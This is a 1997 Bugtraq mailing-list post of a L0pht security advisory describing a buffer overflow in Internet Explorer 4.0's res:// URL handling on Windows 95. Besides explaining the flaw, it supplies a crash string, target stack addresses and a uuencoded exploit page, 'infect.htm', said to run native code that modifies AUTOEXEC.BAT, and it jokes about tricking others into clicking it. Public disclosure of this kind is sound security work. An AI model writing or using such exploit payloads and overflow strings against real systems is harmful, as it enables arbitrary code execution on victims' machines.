From dildog@L0PHT.COM Tue Nov 11 11:22:48 1997 Date: Mon, 10 Nov 1997 15:43:06 -0500 From: DilDog To: BUGTRAQ@NETSPACE.ORG Subject: L0pht Advisory: IE4.0 Document: L0pht Security Advisory URL Origin: http://l0pht.com/advisories.html Release Date: November 1st, 1997 Application: Microsoft Internet Explorer 4.0 Suite Severity: Viewing remote HTML content can execute arbitrary native code Author: dildog@l0pht.com Operating Sys: Windows 95 ------------------------------------------------------------------------------- ======== Scenario ======== The Microsoft Internet Explorer 4.0 Suite, including all programs supplied with it that read and/or process HTML from either local machines, intranet machines, or remote internet machines are subject to a buffer overflow in the HTML decoding process. The buffer overflow can cause the application to page fault, or in the worst case, execute arbitrary precompiled native code. ======= Example ======= 1. Copy the supplied HTML file(s) into a location that is accessible via the target application. 2. Point to it. Look at it. 3. Click on the link. (or let someone click it for you) 4. Become aware of what happens to your machine. 5. Freak out and beg Microsoft to make the bad man stop. ================= Technical Details ================= The problem here lies in the deciphering of the URL line format itself. The base HTML library that is used by the Internet Explorer 4.0 Suite and the following programs are vulnerable: - Outlook Express (both mail and news) - Windows Explorer - Internet Explorer (different than regular explorer, really) This problem, because it stems from a programming flaw in the HTML decoding system, is unaffected by the Explorer "Security Zones" feature. In other words, if you turn on the highest security level for the zone from where the exploit HTML is being viewed, you are still vulnerable. The critical problem here is a buffer overflow in the parsing of a particular new type of URL protocol. The "res://" type of URL is meant to allow access to a local resource embedded in a local DLL file. This is useful for archiving entire websites into a DLL and is not, in its truest concept, a security flaw. For example, to read something out of the IE4.0 Tour (stored in a DLL) try the following URL: res://ie4tour.dll/page1-6.htm The buffer overflow is on the actual filename specified. To crash your machine go ahead and try res://blahblahblah ... blahblah/ in your Internet Explorer window where the amount of 'blah' equals 265 characters. The function that goes through the filename and validates it is flawed on Windows 95. Without checking the length, the filename is uppercased, concatenated with '.DLL' if it isn't there already, and in the process, copied into a fixed size buffer. ======== Solution ======== Currently, there is no solution available for this flaw. You can't set any Internet Explorer options to avoid it, and you are not protected by any level of zone security. Simply don't surf the web, read email or view net news using Internet Explorer 4.0 until Microsoft puts up a hotfix. ============ Exploit Code ============ Here we go... When constructing the exploit we want to try something useful. Lets's start with appending text of your choice to AUTOEXEC.BAT... (note that running native code lets you do pretty much anything you want) Note that the location of the exploit string in the stack is very important and it varies from target application to target application. Constructing the exploit string: Figure out stack location for exploit code... App Loc Internet Explorer 0x0057C144 Windows Explorer 0x0088A0F4 ... Yeah, I know that those locations have null bytes in them and you can't put those (or lowercase letters, or CR/LF or 0x07 or anything like that) in the exploit string... but we'll let microsoft fix that for us. Step thru the process to see IE add that extra null character for you. Will they ever cease to amaze... Put together what you wanna do, tack on the necessary jump addresses and all that. That's it. And now, UUENCODED to preserve freshness: ************************************************************************* * MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER, _NOT_ * * REGULAR OL' WINDOWS EXPLORER. (put it on a website and download it or * * click on the IE desktop icon (run iexplore.exe) and type in the name * * of the file into the URL line) IT WON'T WORK OTHERWISE!!!! * * (though it could be made to do so) * ************************************************************************* ----====/ SNIP section 1 of uuencode 5.20 of file infect.htm by R.E.M. begin 644 infect.htm M/&AT;6P^#0H\:&5A9#X-"CQT:71L93X-"DEN=&5R;F5T($5X<&QO:71E<@T* M/"]T:71L93X-"CPO:&5A9#X-"CQB;V1Y(&)G8V]L;W(](T9&1D9&1B!T97AT M/2,P,#`P,#`^#0H-"CQC96YT97(^#0H\:#$^5VAA="!D;R!)('=A;G0@=&\@ M:6YF96-T('1O9&%Y/SPO:#$^#0H-"D-L:6-K(&AE&5C+F)A=#QP/@T*#0H\82!H_@.^`_]-:6E"0D#/;LP)3@^L$4U"[X(#YO__3@^P,D%A0 M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O M^+__TY"0D,S,+2TM+2TM+2TM+2TM+4,Z7$%55$]%6$5#+D)!5("-BD5#2$\@ M34E#4D\D3T94(#!73EH@64]5+BXN(%)%4$5.5"!!3D0@0D4@4T%6140AC8I0 M055318V*@"TM+2TM+2TM+2TM+2TM+2U!04%!0D)"0D,!(+Z_1$1$143!5R\- M"B(^#0H\9F]N="!F86-E/2)7:6YG9&EN9W,B('-I>F4]*S8^_SPO9F]N=#X\ M9F]N="!S:7IE/2LV/CT\+V9O;G0^/&9O;G0@9F%C93TB5VEN9V1I;F=S(B!S M:7IE/2LV/B9G=#PO9F]N=#X-"CPO83X-"@T*/"]C96YT97(^#0H-"CPO8F]D ->3X-"CPO:'1M;#X-"CX- ` end sum -r/size 62455/917 section (from "begin" to "end") sum -r/size 5779/643 entire input file /====---- SNIP A haiku: Microsoft IE Is there no security? Not if you ask me. dildog@l0pht.com (11/1/97) ------------------------------------------------------------------------------- For more L0pht (that's L - zero - P - H - T) advisories check out: http://l0pht.com/advisories.html